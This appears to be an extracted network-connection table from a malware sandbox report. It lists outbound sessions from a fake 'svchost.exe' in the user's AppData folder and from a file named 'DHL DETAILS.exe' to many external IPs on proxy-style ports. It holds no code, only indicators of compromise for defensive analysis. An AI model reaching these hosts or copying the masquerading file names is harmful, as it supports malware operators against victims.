                                                                                    6915192.168.2.562831138.36.150.16108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6916192.168.2.56527834.30.26.177312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6917192.168.2.562833203.171.19.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6918192.168.2.56284952.151.210.204900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6919192.168.2.56544051.15.132.2151637943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6920192.168.2.565249194.67.91.1538056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6921192.168.2.565345162.214.227.684554056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6922192.168.2.56523381.17.94.503430056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6923192.168.2.565254148.72.215.230499056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6924192.168.2.565313176.192.65.34502056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6925192.168.2.55985472.206.181.976494343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6926192.168.2.56284545.11.95.165603956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6927192.168.2.562378207.180.234.2203050756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6928192.168.2.562884121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6929192.168.2.559916219.71.216.788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6930192.168.2.56287560.190.68.154730256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6931192.168.2.562629117.160.250.130889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6932192.168.2.56547243.255.113.2328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6933192.168.2.56288935.199.90.225888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6934192.168.2.56291718.135.211.182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6935192.168.2.56291123.137.248.197888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6936192.168.2.562921184.185.2.12414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6937192.168.2.56291951.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6938192.168.2.562180117.160.250.163882856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6939192.168.2.559917154.0.14.116312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6940192.168.2.562953199.58.185.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6941192.168.2.565473165.232.89.116312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6942192.168.2.562937112.78.155.210808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6943192.168.2.549172103.48.68.1018356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6944192.168.2.562982104.20.198.498056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6945192.168.2.549179171.22.108.188312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6946192.168.2.562938202.162.219.10108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6947192.168.2.54922451.75.126.1506461556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6948192.168.2.56298965.49.38.202312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6949192.168.2.558753195.248.243.149723743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6950192.168.2.5607258.210.8.1571900143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6951192.168.2.562783142.54.235.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6952192.168.2.562969103.146.137.5108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6953192.168.2.56300395.164.207.1575837856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6954192.168.2.549257103.156.249.30808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6955192.168.2.56012052.151.210.204900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6956192.168.2.562993198.105.101.129575856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6957192.168.2.560349121.204.179.70777743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6958192.168.2.55998245.124.184.138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6959192.168.2.56298745.11.95.166601656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6960192.168.2.561083125.227.225.157338943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6961192.168.2.562999218.57.210.186900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6962192.168.2.56300934.92.12.210923856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6963192.168.2.560625162.241.158.2046336043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6964192.168.2.56169998.175.31.195414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6965192.168.2.563011121.164.200.18108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6966192.168.2.562966111.206.0.99818156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6967192.168.2.549281207.180.198.2411722856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6968192.168.2.54925482.223.121.72498556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6969192.168.2.56301218.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6970192.168.2.560612143.255.176.161415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6971192.168.2.56300395.164.207.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6972192.168.2.563037104.25.58.398056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6973192.168.2.563038185.238.228.968056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6974192.168.2.563034199.58.185.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6975192.168.2.56302718.135.211.182312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6976192.168.2.56303151.15.247.931637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6977192.168.2.560798212.110.188.2073440543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6978192.168.2.563057142.54.235.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6979192.168.2.563123104.21.31.1898056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6980192.168.2.560899146.190.84.2091825543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6981192.168.2.555892198.49.68.808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6982192.168.2.555464212.237.218.68312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6983192.168.2.56305635.199.90.225888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6984192.168.2.560758184.181.217.194414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6985192.168.2.563199172.67.181.978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6986192.168.2.563178107.180.90.88807856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6987192.168.2.563183162.241.46.66435356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6988192.168.2.563211164.92.86.1135755256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6989192.168.2.56307614.103.24.20800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6990192.168.2.56101338.50.130.93567843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6991192.168.2.563107221.6.139.190900256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6992192.168.2.54933237.187.73.71036256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6993192.168.2.563174167.86.69.1423639456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6994192.168.2.560751112.30.155.831279243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6995192.168.2.5631315.44.42.1155838656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6996192.168.2.561007213.136.75.855905843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6997192.168.2.56163272.49.49.113103456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6998192.168.2.563191102.223.20.2178056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6999192.168.2.563239142.54.235.9414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7000192.168.2.562818192.252.216.81414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7001192.168.2.56322918.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7002192.168.2.56131945.189.151.2799943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7003192.168.2.549349119.18.149.110502043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7004192.168.2.563246104.16.105.1068056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7005192.168.2.562935217.182.129.103312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7006192.168.2.563279172.67.182.968056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7007192.168.2.56297952.151.210.204900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7008192.168.2.5633405.161.219.13422856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7009192.168.2.5632488.209.255.13312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7010192.168.2.563454104.16.221.578056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7011192.168.2.563457172.67.25.2048056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7012192.168.2.561828138.36.199.14415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7013192.168.2.56336294.131.64.945837856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7014192.168.2.56327845.11.95.165504756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7015192.168.2.563287212.127.93.185808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7016192.168.2.56194414.207.65.204808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7017192.168.2.56330951.15.223.121637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7018192.168.2.56330693.190.142.573128056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7019192.168.2.563346123.110.158.2368056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7020192.168.2.563290103.153.247.102818156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7021192.168.2.563448177.234.194.22699956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7022192.168.2.56336343.128.146.421567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7023192.168.2.563373213.252.245.221611656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7024192.168.2.563300103.48.68.1018356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7025192.168.2.56333864.43.89.102636156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7026192.168.2.563562104.18.251.2088056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7027192.168.2.56347314.103.24.20800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7028192.168.2.563004138.36.150.16108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7029192.168.2.56336294.131.64.945837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7030192.168.2.563544192.252.216.81414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7031192.168.2.56223451.161.33.2064452356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7032192.168.2.562000146.190.85.79312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7033192.168.2.563388220.194.189.144312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7034192.168.2.5635208.222.175.2105055456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7035192.168.2.56354346.47.197.210312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7036192.168.2.563492103.86.109.388056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7037192.168.2.549460162.223.91.118056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7038192.168.2.549449128.127.94.160567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7039192.168.2.56356418.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7040192.168.2.562212138.197.148.2158056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7041192.168.2.5635983.90.100.12312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7042192.168.2.562808142.54.228.193414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7043192.168.2.563330117.160.250.131889956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7044192.168.2.562359164.92.86.1135056456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7045192.168.2.563164162.240.231.2113554156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7046192.168.2.558815138.68.155.221076043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7047192.168.2.55889045.11.95.165501943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7048192.168.2.549641185.109.184.1506381956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7049192.168.2.563608194.247.173.17808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7050192.168.2.56325783.12.149.202808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7051192.168.2.562285185.49.31.207808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7052192.168.2.56361693.171.243.253108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7053192.168.2.550012164.92.86.113602836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7054192.168.2.563685138.68.60.8312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
